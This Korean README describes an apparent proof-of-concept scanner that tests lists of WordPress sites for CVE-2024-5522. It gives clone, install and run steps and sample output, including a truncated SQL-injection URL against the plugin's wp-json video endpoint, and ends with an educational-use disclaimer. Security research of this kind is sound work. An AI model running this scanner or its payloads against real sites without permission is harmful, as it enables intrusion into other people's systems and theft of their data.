
WordPress 웹사이트의 CVE-2024-5522 취약점을 위한 PoC 익스플로잇 스캐너
WordPress 웹사이트의 CVE-2024-5522 취약점을 위한 PoC 익스플로잇 스캐너입니다. 이 도구는 대상 URL 목록을 스캔하고 특정 페이로드를 시도하여 사이트가 취약한지 확인함으로써 취약점을 식별하고 익스플로잇하는 데 도움을 줍니다.
저장소를 클론합니다:
git clone https://github.com/geniuszly/CVE-2024-5522
디렉터리로 이동합니다:
cd CVE-2024-5522
필요한 Python 패키지를 설치합니다:
pip install -r requirements.txt
대상 목록 준비: 스캔하려는 WordPress 사이트의 URL이 포함된 텍스트 파일을 만듭니다. 각 URL은 새 줄에 있어야 합니다.
스캐너 실행:
python3 main.py
대상 목록 파일의 경로를 입력하라는 메시지가 표시됩니다. 그런 다음 도구는 제공된 페이로드를 사용하여 각 대상에 대해 CVE-2024-5522 취약점을 스캔합니다.
결과 해석:
출력은 색상으로 구분됩니다:
______ _______ ____ ___ ____ _ _ ____ ____ ____ ____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | ___| ___|___ \|___ \
| | \ \ / /| _| _____ __) | | | |__) | || |_ ____|___ \___ \ __) | __) |
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____|__) |__) / __/ / __/
\____| \_/ |_____| |_____|\___/_____| |_| |____/____/_____|_____|
CVE-2024-5522 Exploit Scanner
developed by geniuszly
Введите путь к списку целей: targets.txt
[Сканирование http://example.com]
[-] http://example.com не уязвима.
[Сканирование http://vulnerable-site.com]
[+] Цель уязвима! :D http://vulnerable-site.com
[Сканирование http://another-site.com]
[!] Ошибка подключения к http://another-site.com: Connection timeout
[Уязвимые URL-адреса]
[+] http://vulnerable-site.com/wp-json/h5vp/v1/video/0?id=-1'...
익스플로잇에 사용되는 페이로드는 payload.txt 파일에 저장됩니다. 필요에 따라 이 파일을 사용자 정의하거나 수정할 수 있습니다.
이 도구는 교육 목적 및 윤리적 보안 테스트용으로만 제작되었습니다. 명시적 허가 없이 이 도구를 대상에 무단 사용하는 것은 불법이며 엄격히 금지됩니다.